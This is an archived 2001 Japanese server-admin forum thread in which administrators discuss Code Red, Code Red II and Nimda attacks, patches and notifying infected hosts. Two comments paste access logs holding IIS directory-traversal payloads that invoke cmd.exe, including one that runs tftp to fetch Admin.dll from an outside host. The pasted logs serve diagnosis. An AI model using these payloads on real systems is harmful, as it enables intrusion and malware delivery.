このページは福井県立大学の田中求之が2006年1月まで運用していた Mac のサーバ運用に関する会議室 「Web Scripter's Meeting」の記録です。情報が古くなっている可能性がありますのでご注意ください。

拡張子idaとは? 4

発言者:竹内
( Date Friday, August 10, 2001 20:02:32 )


すみません、わたしのせいで3が終わってしまいましたね。
あらためまして、4です。

竹内 さんからのコメント
( Saturday, August 11, 2001 02:22:48 )

いまさらの情報かもしれませんが、ここは結構わかりやすいですね。

→  incidents.org

今井真人 さんからのコメント
( Sunday, August 12, 2001 22:59:08 )

default.idaにゼロバイトのファイルを置いて、ウェブサーバを運営して
います。いくらかCode Redに対するサーバの負荷を軽くしようと思って、
こうしているのですが、もう一つメリットがありました。

エラーログがdefault.idaアクセスで山のようになり、対処が必要なエラー
が埋もれてしまうのを防ぎます。

松谷隆績 さんからのコメント
( Monday, August 13, 2001 15:36:25 )

いつもこのサイトは参考にさせて頂いております。
code redはうちにも来ています。Web共有でサーバをやっておりますが、
Webサーバ自体は普通に動いています。
ところがルータ(MN128SOHO)にアクセス出来ないようになります。
これも動作は普通にしているのですが、設定ページに入れないトラブルが
出ています。リスタートすると、設定ページへアクセス出来るようになるのです。
実害は無いのですが、困ったものです。
侵入されていると思われるWebサーバに対して、お知らせのメールとかをした
方が良いのでしょうか?

井上 さんからのコメント
( Monday, August 13, 2001 16:52:07 )

一応、相手がわかっているならば、感染していることを教えてあげたほうが
いいと思います。礼儀正しい文章で書けば大変喜ばれると思います。
早い時期ならば、喜ばれます。すでに対応済ならば(数回でアタックが来なくなる)
そういうところは、する必要がないでしょう。何日も続けて来るところはやはり管理者
がきずいていないので、お知らせしてあげるのがよろしいかと思います。
jpドメインについて、サーバーがどれかわかるものは何件かお知らせを一応しておきました。
丁寧な返事とともに、対応したとの報告をいただきました。
問題は、ホストがよくわからないもの、(wwwサーバーではない)
と韓国や、中国などの言葉がよくわからないところへのお知らせが、私の語学力では
難しいです。

しあわせのツボ さんからのコメント
( Monday, August 13, 2001 19:02:18 )

私も連絡先がわかるものに対してはメールで通知しています。
128kしかない線が輻輳するのはたまらないので。
頭に英文、下に和文で書いておけば、ある程度の相手に対して
通じるでしょう。
# と言うか、それくらいしかできません。

それにしても相変わらずocn.ne.jpはワームの巣窟だな…

たまちゃん さんからのコメント
( Monday, August 13, 2001 20:06:06 )

少し古い情報ですが,SecurityFocus.com がまとめて感染者に報告
してくれるということでした。

→  Infection Notification

今井真人 さんからのコメント
( Wednesday, August 15, 2001 16:30:34 )

マイクロソフト社が、Code Red 2 ワーム駆除ツールの配布を開始しました。
これで、騒ぎが治まればいいですけど。

http://www.microsoft.com/japan/technet/security/redfix.asp

今泉克美 さんからのコメント
( Wednesday, August 15, 2001 17:02:27 )

http://www.microsoft.com/japan/technet/security/redfix.asp
このツール、12日に使ってみました。

ある職場でインターネット側からは
見えないファイルサーバにWinNT4.0を使ってまして、
Web&メールサ−バとしては使ってないマシンだったのですが
それが盲点で、IISが、常駐しているのを12日まで
見つけられませんでした。(ちょっと恥)

ま、感染しっこないのですが、念のため未感染であることを
確認したのち、上記のツールで
-disable フラグ
を立てて、
「サーバーの IIS が恒久的に無効になります。 」
というモードで実行。

結果、DOSプロンプト上で、未感染であることと、
ほげほげを修正みたいなのが一杯出た挙句に
最後はエラー表示。。。

「サーバーの IIS が恒久的に無効になります。 」
ですが、別にアンインストールされるわけでもなく。
無効にするぐらいならアンインストールしてやりたくなり
結局IISを殺しました。

おそらくマイクロソフトに問い合わせがいっぱい
行きそうなツールでした。

Easy way to report CODE RED II さんからのコメント
( Wednesday, August 15, 2001 19:26:34 )

this is easier....

grep 'default.ida' access_log | mail -s 'APACHE' redalert@dshield.org

see

<a href="http://www.dshield.org/codered.html">www.dshield.org</a>

for more details

also wouldn't hurt to send to microsoft....
re:

>少し古い情報ですが,SecurityFocus.com がまとめて感染者に報告
>してくれるということでした。

>→  Infection Notification


→  REPORT your LOG

田中求之 さんからのコメント
( Friday, August 17, 2001 19:47:51 )

別の話題のところに間違って書き込んでしまったのですが… (^_^;;

MacHTTP も Code Red のアタックでバッファー・オーバーランを起こしてしまう
可能性があるそうで、この問題に対処した 2.5b1 という新しいベータ版が
出ています。

→  MacHTTP.ORG

田中求之 さんからのコメント
( Thursday, August 23, 2001 12:50:57 )

あいかわらずしつこくアタックする  Code Red II がいるなぁ、と思ったら
私の学部のサーバでした。やれやれ...

Code Red II は、自分と近い IP に頻繁にアタックするようですので、身近に
感染サーバがあるとうるさくて仕方がないですね。

石津@RJC さんからのコメント
( Thursday, August 23, 2001 13:04:35 )

いくつかのMLで話題になっていますが、CodeRedIIの亜種の存在が
確認され出したようです。
こんどは攻撃対象IPアドレスのランダム性が向上?したようで。
またしばらく面倒が続きそうですね。

たまちゃん さんからのコメント
( Sunday, August 26, 2001 20:48:05 )

Web Server 4D が CodeRed Tracking and Notification Feature
という機能を付け加えたようですね。

→  Welcome to WS4D 3.5.4fc9

今井真人 さんからのコメント
( Monday, August 27, 2001 07:56:49 )

CodeRedのせいで、Error.logをこのところ詳細に調べています。気になったことを
1つ見つけました。全くディレクトリやデータが存在しないのにアクセスしてエラー
を出している例を見かけます。

これって、以前にクラックされたかサーバなのか?どうかの判別に使われているよう
な気がします。

p さんからのコメント
( Monday, August 27, 2001 13:09:11 )

CodeRedIIの変種が出ています。
以前にクラックされたか?の判定のみが微妙に違っていて
そのせいで、2重に感染しているサーバもあるそうです。
ログではどうなっていますでしょう?

今井真人 さんからのコメント
( Monday, August 27, 2001 21:40:47 )

>ログではどうなっていますでしょう?

NNNNNN...のタイプと
XXXXXX...のタイプの2種類あります。8月初旬から、変わってません。

今井真人 さんからのコメント
( Tuesday, August 28, 2001 22:07:14 )

永遠の命を持った『Code Red』ワーム
http://japan.cnet.com/News/2001/Item/010828-3.html

Code Redの変種に関する情報です。10月以降に自動消滅する制限が取り外されて
永遠に機能します(怒)。

→  永遠の命を持った『Code Red』ワーム

今泉克美 さんからのコメント
( Wednesday, August 29, 2001 09:31:24 )

現時点でIISのINDEXサービスで
バッファオーバフロー対策を行っていない
サーバ(8割ぐらいあるのかしら?)が
10月時点できちんと対処される確率は
極めて少ないという悲観的な見方が
出始めています。
罹患していることに気がついていない
こともありうるかもしれません。
複雑な思いがいたします。

sayano さんからのコメント
( Friday, September 07, 2001 08:56:14 )

最近同じアドレスから連続して来る場合があるのですが新種でしょうか?

チロキ さんからのコメント
( Tuesday, September 18, 2001 23:16:55 )

先ほどからwebサーバに変わったアクセスが入ります、
これが勝手にパッチを当てるってやつでしょうか?
以下そのLOG
Tue, 18 Sep 2001  22:37:14 +0900  404  61.141.gd.cn  /scripts/root.exe?/c+dir  131
Tue, 18 Sep 2001  22:37:17 +0900  404  61.141.gd.cn  /MSADC/root.exe?/c+dir  131
Tue, 18 Sep 2001  22:37:28 +0900  404  61.141.gd.cn  /scripts/..%255c../winnt/system32/cmd.exe?/c+dir  131
Tue, 18 Sep 2001  22:37:33 +0900  404  61.141.gd.cn  /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir  131
Tue, 18 Sep 2001  22:37:36 +0900  404  61.141.gd.cn  /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir  131
Tue, 18 Sep 2001  22:37:39 +0900  404  61.141.gd.cn  /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir  131
Tue, 18 Sep 2001  22:37:42 +0900  404  61.141.gd.cn  /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir  131
Tue, 18 Sep 2001  22:37:47 +0900  404  61.141.gd.cn  /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir  131
Tue, 18 Sep 2001  22:37:20 +0900  404  61.141.gd.cn  /c/winnt/system32/cmd.exe?/c+dir  131
Tue, 18 Sep 2001  22:37:23 +0900  404  61.141.gd.cn  /d/winnt/system32/cmd.exe?/c+dir  131
Tue, 18 Sep 2001  22:37:50 +0900  404  61.141.gd.cn  /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir  131
Tue, 18 Sep 2001  22:37:56 +0900  404  61.141.gd.cn  /scripts/..%c1%9c../

winnt/system32/cmd.exe?/c+dir  131
Tue, 18 Sep 2001  22:37:58 +0900  404  61.141.gd.cn  /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir  131
Tue, 18 Sep 2001  22:38:01 +0900  404  61.141.gd.cn  /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir  131
Tue, 18 Sep 2001  22:38:04 +0900  404  61.141.gd.cn  /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir  131
Tue, 18 Sep 2001  22:38:07 +0900  404  61.141.gd.cn  /scripts/..%252f../winnt/system32/cmd.exe?/c+dir  131

やまかわ さんからのコメント
( Wednesday, September 19, 2001 00:03:20 )

わたしのサーバーも チロキ さんと同じ状態です。 
前回のCodeRedより アクセスの回数が異常に多いように思います。
Statusのバーが真っ黒!! ちなみにMaximum: 30 です。
今のところ 落ちるまでには至っておりません。

snappish さんからのコメント
( Wednesday, September 19, 2001 00:18:58 )

私のところにもやってきています
心配になってこちらのサイトに来てみたら
話題になっていてビックリしています
アクセスログは
GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231
こんな感じがずっと来ます
ちなみに私の環境ではアパッチが落ちました
アクセスログのIPアドレスにアクセスしてみたら
fuck USA Government
って感じで乗っ取られていました
さすがに恐いので
アパッチを止めました
WIN系の乗っ取りに見えるので心配無いとは思いますが
恐いです

田中求之 さんからのコメント
( Wednesday, September 19, 2001 01:05:30 )

>WIN系の乗っ取りに見えるので心配無いとは思いますが

過去に知られているセキュリティ・ホールを次々にアタックするアクセスです。
おそらく、一般に出回っているアタック用のソフトみたいなものを動かしている
んだと思います。Script Kiddy とか言われる、ろくな知識はないくせに、
アタックすることを楽しむ連中によるアクセスだと思われます。最近、
増えてますよ。

で、MacOS のサーバであるかぎりは、アクセスが多くなってうっとおしい
以外は害がありませんので安心してください。私のこのサイトも幾度となく
同じような連続アタックを受けてますが、いっぺんも落ちてませんから。

だいたい、アタックする前に、ターゲットのサイトの OS をチェックするって
のは、誰が考えても基本中の基本だと思いませんか? それすらも怠って
ただアタック用のソフトは知らせるようなバカに落とされるほど MacOS の
サーバは弱くありませんって (^_^)

田中求之 さんからのコメント
( Wednesday, September 19, 2001 01:07:34 )

MacOS 以外の OS でのサーバで、もし乗っ取りや改ざんの被害にあったの
でしたら、冷たいようですが、サーバのセキュリティ管理が甘いということ
です。すぐにサーバや OS のパッチを調べて、しかるべき処置をとってください。

田中求之 さんからのコメント
( Wednesday, September 19, 2001 01:14:27 )

>おそらく、一般に出回っているアタック用のソフトみたいなものを動かして
いる

Solaris に感染して、そこから IIS のアタックを試みるワームも、この手の
アタックを行っていたように思います。

いずれにせよ、MacOS のサーバにとっては無害です。

にぶる さんからのコメント
( Wednesday, September 19, 2001 02:21:40 )

「にぶる」と申します。

以前から田中先生のHP、大変参考にさせて頂いて助かっております。
今までROMだったのですが、はじめて発言させていただきます。

昨日から当方のサーバにもかなり頻繁なアクセスが多くなっておりますが
田中先生のおっしゃる、「アタック用ソフト」とは違う模様です。
間違っているかもしれませんが、「CodeGreen or CRclean」ワームのアタ
ックのようですが・・・
チロキさんのおっしゃっていたように、IISの脆弱性にパッチをあてる
ワームのアタックだと思います。


→  「コードグリーン」ワームに関する情報

いとうみき さんからのコメント
( Wednesday, September 19, 2001 07:28:53 )

みなさん、こんにちは

チロキさんが書かれたアタックですが、当方のサーバーでも昨日より猛烈なアタックが始まって
おり、QPQ2.1でGlobalSatusのHighが160をこえるところまでいきました。それほどメモリを割
り当ててはいなかったのですが、160を越えた辺りでメモリ不足のエラーメッセージと共に、
フリーズしました。一晩2回のフリーズは初めてでしたが、現在40MBほどを割り当てて、様子
を見ているところです。
ASIP側は、まったく問題はないのですが。

《書き込みにコメント付け隊》
   いとうみきでした

今井真人 さんからのコメント
( Wednesday, September 19, 2001 10:11:03 )

>/scripts/root.exe?/c+dir

の攻撃ですが、自宅、職場のウェブサーバに来てました。1分おきに10回程度の
アタック受けてます。こりゃCodeRedより頻繁で嫌になってしまいます。

相手先にIPアドレスにウェブアクセスしたら、クラックされていて妙なウインド
ウを開きます。クラックされたサーバへのアクセスWindowsクライアントでは
危険かもしれませんよ。

AI さんからのコメント
( Wednesday, September 19, 2001 10:13:42 )

私のところではLinuxとMacサーバが多いのですが、一台だけ預かっているIISサーバがあります。
早くからCodeRED対策は施してあったので、感染から免れていましたが、
今回の新しい攻撃でCドライブにadmin.dllとうファイルが消しても消しても
コピーされてしまいます。
このファイルが何をするのかわかりません。

たまちゃん さんからのコメント
( Wednesday, September 19, 2001 10:50:22 )

すでにご存知の方も多いと思いますが,「Nimda」と呼ばれるウイ
ルスです。

http://www.cert.org/advisories/CA-2001-26.html

http://www.nai.com/japan/virusinfo/virN.asp?v=W32/Nimda@MM

http://itpro.nikkeibp.co.jp/free/ITPro/USNEWS/20010919/5/

http://www.symantec.co.jp/region/jp/sarcj/data/w/w32.nimda.a@mm.html

田中求之 さんからのコメント
( Wednesday, September 19, 2001 11:00:45 )

なるほど、そうでしたか。情報を見落としてました(いかん、いかん)。

AI さんからのコメント
( Wednesday, September 19, 2001 12:48:05 )

勉強不足かもしれませんが「Nimda」とは違うように思います。
「Nimda」はメールを送信するか。感染したホームページを見ることに
よって感染するようです。
HTTPのアタックはしないと解釈してますが?
どうなんでしょう?

田中求之 さんからのコメント
( Wednesday, September 19, 2001 12:59:15 )

symantec のリポートによると、メールで自分をばらまく、ホームページを
通じてウィルスのダウンロードを行わせる、そして、穴の開いた IIS にア
タックもする(これがポート80へのアタックになる)、と3種類の行動を
とるようです。

田中求之 さんからのコメント
( Wednesday, September 19, 2001 13:17:50 )

色々な情報源をあたってみましたが、情報がまだ確定していないようですね。

確かに AI さんがおっしゃるように、サーバへのアタックを行うとは書いてない
ページもあります。

AI さんからのコメント
( Wednesday, September 19, 2001 13:19:26 )

「Nimda」はREADME.TXTを添付ファイルとして感染します。
今、サーバのログをみると
/scripts/..%2f../winnt/system32/cmd.exe, /c+tftp%20-i%20***.***.***.***%20GET%20Admin.dll%20e:\Admin.dll
良くわからないのですが、winnt/system32/cmd.exeを実行してadmin.dllを
置き換える攻撃のようです。
「Nimda」によるものでしょうか?
動いているIISは「Nimda」については対策済みなんですが。

AI さんからのコメント
( Wednesday, September 19, 2001 13:33:38 )

とりあえず、IPAに問い合わせしました。

今井真人 さんからのコメント
( Wednesday, September 19, 2001 14:19:36 )

CodeRedとは、違うようなので新たなスレッドをポストしました。 

Nimda
http://mtlab.ecn.fpu.ac.jp/webcon.mtxt$010919141748.html


→  Nimda